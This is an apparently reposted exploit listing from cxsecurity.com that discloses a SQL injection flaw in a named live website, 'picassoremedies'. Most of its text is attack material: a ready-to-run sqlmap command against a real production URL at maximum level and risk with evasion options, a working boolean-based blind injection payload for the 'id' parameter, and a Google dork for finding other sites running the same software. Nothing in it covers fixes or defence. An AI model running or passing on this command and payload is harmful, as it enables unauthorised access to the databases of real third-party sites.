picassoremedies - SQL Injection vulnerability
2024-7-7 05:35:19 Author: cxsecurity.com(查看原文) 阅读量:6 收藏

**************************** #Exploit Title: picassoremedies - SQL Injection vulnerability #Date: 2024-07-05 #Exploit Author: Mahdi Karimi #Vendor Homepage: https://picassoremedies.in #Google Dork: "Powered by picassoremedies" #Tested On: Kali Linux sqlmap: python sqlmap.py -u "https://picassoremedies.in/product-detail.php?id=137" --level=5 --risk=3 tamper=space2comment --random-agent Testing Method; - boolean-based blind Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=137' AND 1647=1647-- dWxa ************************************************** #Discovered by: Mahdi Karimi #Email : [email protected] **************************************************


文章来源: https://cxsecurity.com/issue/WLB-2024070012
如有侵权请联系:admin#unsafe.sh